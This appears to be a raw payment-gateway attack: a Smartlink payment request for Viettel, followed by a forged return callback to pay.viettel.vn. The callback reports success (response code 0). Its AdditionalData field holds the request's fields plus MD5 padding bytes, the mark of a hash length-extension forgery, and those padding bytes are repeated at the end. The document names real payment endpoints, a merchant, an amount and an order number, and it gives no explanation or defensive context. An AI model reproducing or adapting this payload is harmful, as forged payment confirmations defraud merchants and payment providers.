https://payment.smartlink.com.vn/vpcpay.do
?vpc_AccessCode=V1E2T3T4E5L6
&vpc_Version=1.1
&vpc_Command=pay
&vpc_OrderInfo=0977966393
&vpc_Locale=vn
&vpc_Merchant=VIETTEL
&vpc_TicketNo=10.58.62.170
&vpc_Amount=10000000
&vpc_SecureHash=1A698680F86BBE470BBCCB453EC3B383
&vpc_ReturnURL=https://pay.viettel.vn/Receiver!onSmartlink.do
&vpc_Currency=VND
&vpc_MerchTxnRef=150910144407239

https://pay.viettel.vn/Receiver!onSmartlink.do
?vpc_AcqResponseCode=
&vpc_AdditionalData=V1E2T3T4E5L610000000payVNDvn150910144407239VIETTEL0977966393https://pay.viettel.vn/Receiver!onSmartlink.do10.58.62.1701.1%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%C8%04%00%00%00%00%00%00
&vpc_Amount=10000000
&vpc_BatchNo=
&vpc_CardType=
&vpc_Command=pay
&vpc_CurrencyCode=VND
&vpc_Locale=vn
&vpc_MerchTxnRef=150910144407239
&vpc_Message=
&vpc_OrderInfo=0977966393
&vpc_Merchant=VIETTEL
&vpc_ResponseCode=0
&vpc_TransactionNo=3434132324314
&vpc_Version=1.1
&vpc_SecureHash=4BC40A6E35561046C3BA9FB2E61D56A8




\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\x04\x00\x00\x00\x00\x00\x00
